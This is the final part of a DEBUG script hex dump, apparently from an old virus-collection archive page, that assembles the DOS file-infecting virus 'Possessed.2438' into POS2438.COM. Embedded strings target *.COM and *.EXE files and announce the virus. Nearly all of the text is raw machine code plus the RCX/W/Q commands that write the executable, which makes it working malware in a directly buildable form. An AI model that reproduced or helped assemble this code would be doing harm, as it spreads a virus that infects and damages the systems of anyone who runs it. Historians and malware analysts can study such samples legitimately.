E 06A0 1C 0A DB 74 16 8B CB 03 0E 85 01 8A 54 01 03 16
E 06B0 87 01 B4 0C CD 10 83 C6 02 EB E4 5E 32 C0 59 E2
E 06C0 DC 5E C3 C7 44 12 70 19 8B 44 0E 05 10 00 2E A3
E 06D0 79 00 8B 44 10 2E A3 7B 00 8B 44 14 2E A3 7F 00
E 06E0 8B 44 16 05 10 00 2E A3 7D 00 8B 44 04 83 7C 02
E 06F0 00 74 01 48 BB 00 02 F7 E3 03 44 02 83 D2 00 05
E 0700 0F 00 83 D2 00 25 F0 FF 2E A3 81 00 2E 89 16 83
E 0710 00 05 86 09 83 D2 00 72 5E F7 F3 0B D2 74 01 40
E 0720 89 44 04 89 54 02 2E A1 81 00 2E 8B 16 83 00 BB
E 0730 10 00 F7 F3 2B 44 08 2D 10 00 89 44 16 C7 44 14
E 0740 10 08 89 44 0E C7 44 10 86 0A 2E 8B 1E 67 00 E8
E 0750 56 00 B9 1C 00 33 D2 B4 40 E8 31 00 0E 1F 8B 16
E 0760 81 00 8B 0E 83 00 B8 00 42 E8 21 00 BA 00 00 B9
E 0770 86 09 B4 40 E8 16 00 E9 5B FD 33 C0 8E C0 26 8E
E 0780 16 F6 01 26 8B 26 F4 01 58 07 5D F9 C3 55 06 50
E 0790 33 C0 8E C0 26 89 26 F4 01 26 8C 16 F6 01 58 07
E 07A0 9C 2E FF 1E 55 00 5D C3 33 C9 8B D1 B8 00 42 E8
E 07B0 DB FF C3 B4 02 33 DB CD 10 C3 51 56 28 04 46 E2
E 07C0 FB 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A
E 07D0 66 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A
E 07E0 78 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D
E 07F0 86 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66
E 0800 9A 99 8D 94 97 5F 45 66 53 45 6C 9A 92 87 86 45
E 0810 4B 45 6A 53 45 69 86 9E 86 45 94 8B 45 66 89 7A
E 0820 2F 3F 41 4B 42 4B 42 4C 43 4C 44 4C 45 4C 43 4D
E 0830 46 4D 47 4D 44 4E 48 4E 49 4E 4A 4E 45 4F 4B 4F
E 0840 4C 4F B6 4A B5 4A B5 4B B4 4B B3 4B B2 4B B4 4C
E 0850 B1 4C B0 4C B3 4D AF 4D AE 4D AD 4D B2 4E AC 4E
E 0860 AB 4E 4C 54 4C 55 4D 55 4E 55 4F 56 50 56 51 56
E 0870 52 56 53 56 54 57 55 57 56 57 57 57 58 57 59 58
E 0880 5A 58 5B 58 5C 58 5D 58 5A 59 5B 59 5C 59 5D 59
E 0890 60 59 5F 59 60 59 61 59 62 59 5B 5A 5C 5A 63 5A
E 08A0 64 5A 65 5A 66 5A 67 5A 5C 5B 68 5B 69 5B 6A 5B
E 08B0 6B 5B 6C 5B 6D 5C 6E 5C 6F 5C 70 5D B1 53 B0 54
E 08C0 AF 54 AE 54 AD 55 AC 55 AB 55 AA 55 A9 55 A8 55
E 08D0 A7 56 A6 56 A5 56 A4 56 A3 56 A2 57 A1 57 A0 57
E 08E0 9F 57 9E 57 9D 57 9C 58 9B 58 9A 58 99 58 98 58
E 08F0 9A 59 99 59 98 59 97 59 96 59 95 59 94 59 93 59
E 0900 92 59 99 5A 98 5A 91 5A 90 5A 8F 5A 8E 5A 8D 5A
E 0910 98 5B 8C 5B 8B 5B 8A 5B 89 5B 88 5B 87 5B 86 5C
E 0920 85 5C 84 5C 83 5C 76 63 75 64 75 65 74 66 74 67
E 0930 73 68 73 69 72 6A 71 6B 71 6C 70 6D 70 6E 6F 6F
E 0940 6E 70 6E 71 7B 71 6D 72 7A 72 79 72 6D 73 78 73
E 0950 77 73 76 73 75 73 6C 74 71 74 72 74 73 74 74 74
E 0960 6C 75 6D 75 6E 75 6F 75 70 75 6B 76 6C 76 6D 81
E 0970 6E 81 6F 81 70 80 71 80 72 80 73 80 74 7F 75 7F
E 0980 76 7F 77 7F 78 7E 79 7E 7A 7E 7B 7E 7C 7D 7D 7D
E 0990 7E 7D 7F 7D 80 7D 81 7C 82 7C 83 7C 84 7C 85 7B
E 09A0 86 7B 87 7B 88 7B 89 7A 8A 7A 8B 7A 8C 7A 8D 79
E 09B0 8E 79 8F 79 90 79 91 78 92 78 93 78 94 77 95 77
E 09C0 96 76 97 76 98 75 00 43 3A 2A 2E 43 4F 4D 00 43
E 09D0 3A 2A 2E 45 58 45 00 06 33 C0 8E C0 26 80 3E EC
E 09E0 01 00 75 06 BE 00 01 E9 E8 01 07 8C C0 2E 03 06
E 09F0 79 01 8E D0 2E 8B 26 7B 01 8C C0 2E 03 06 7D 01
E 0A00 2E A3 57 01 2E A1 7F 01 2E A3 55 01 F8 2E FF 2E
E 0A10 55 01 FC F3 A4 33 C0 8E C0 26 C6 06 EC 01 01 58
E 0A20 05 10 00 50 B8 62 07 50 CB 8B C4 2D 00 01 8B E0
E 0A30 8C C8 8E D8 8E D0 1E 2D 10 00 8E C0 8C 06 87 00
E 0A40 50 26 A1 2C 00 A3 85 00 58 1E 06 8E D8 0E 07 BE
E 0A50 0A 00 BF 86 09 B9 06 00 FC F3 A5 BB 14 08 89 1E
E 0A60 0A 00 8C 0E 0C 00 07 1F 07 BE 13 05 B9 48 00 51
E 0A70 B0 25 E8 45 FD BF 08 00 56 FC F3 A4 5E 59 F6 D8
E 0A80 E8 37 FD A1 10 07 05 1B 02 CD 21 89 1E 55 00 8C
E 0A90 06 57 00 BA 50 00 80 EC 10 E8 F1 FC C7 06 71 00
E 0AA0 00 00 8A 16 74 00 88 16 73 00 05 E7 0F E8 DD FC
E 0AB0 89 1E 59 00 8C 06 5B 00 BA 5F 03 80 EC 10 E8 CC
E 0AC0 FC 0E 1F 8E 06 87 00 B4 49 E8 C1 FC BA 86 09 B1
E 0AD0 04 D3 EA 83 C2 20 B4 31 E8 B2 FC 0E 0E 1F 8E 06
E 0AE0 87 00 BE 86 09 BF 0A 00 B9 06 00 FC F3 A5 07 80
E 0AF0 3E 54 00 01 75 08 C6 06 54 00 00 E9 97 00 A1 87
E 0B00 00 BE 95 09 89 44 04 C7 44 02 80 00 89 44 08 C7
E 0B10 44 06 5C 00 89 44 0C C7 44 0A 6C 00 A1 85 00 89
E 0B20 04 B4 30 CD 21 A2 53 00 3C 03 72 1F 8E 1E 85 00
E 0B30 33 F6 B9 C8 00 80 3C 01 75 0E 80 7C 03 3A 75 08
E 0B40 8B D6 83 C2 02 EB 15 90 46 E2 EA 0E 1F BE D6 08
E 0B50 BF 88 09 B9 0D 00 FC F3 A4 BA 88 09 FA 2E 8C 16
E 0B60 75 00 2E 89 26 77 00 FB B8 00 4B BB 95 09 2E 80
E 0B70 3E 53 00 03 72 06 E8 14 FC EB 03 90 CD 21 FA 2E
E 0B80 8E 16 75 00 2E 8B 26 77 00 FB 0E 1F 73 07 BA 08
E 0B90 00 B4 09 CD 21 B4 4D CD 21 B4 4C CD 21 50 4F 53
E 0BA0 32 34 33 38 2E 43 4F 4D 00 00 81 C6 00 01 06 33
E 0BB0 C0 8E C0 26 83 3E EC 01 00 74 13 07 83 EE 5A BF
E 0BC0 00 01 B9 2D 00 FC F3 A5 BB 00 01 F8 FF E3 81 EE
E 0BD0 86 09 07 0E 1F BF 00 01 B9 0B 09 D1 E9 FC F3 A5
E 0BE0 B9 7B 00 8C 06 57 01 C7 06 55 01 4B 08 06 2E FF
E 0BF0 2E 55 01 E9 B7 01 0D 20 20 20 0D 0A 4D 61 62 75
E 0C00 68 61 79 21 0D 0A 0A 54 68 69 73 20 69 73 20 50
E 0C10 6F 73 73 65 73 73 65 64 2E 32 34 33 38 20 76 69
E 0C20 72 75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F
E 0C30 75 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69
E 0C40 70 70 69 6E 65 73 2E 0D 0A 42 72 6F 75

RCX
0B4D
W
Q

ÄÄ POS2438.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

EoF.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT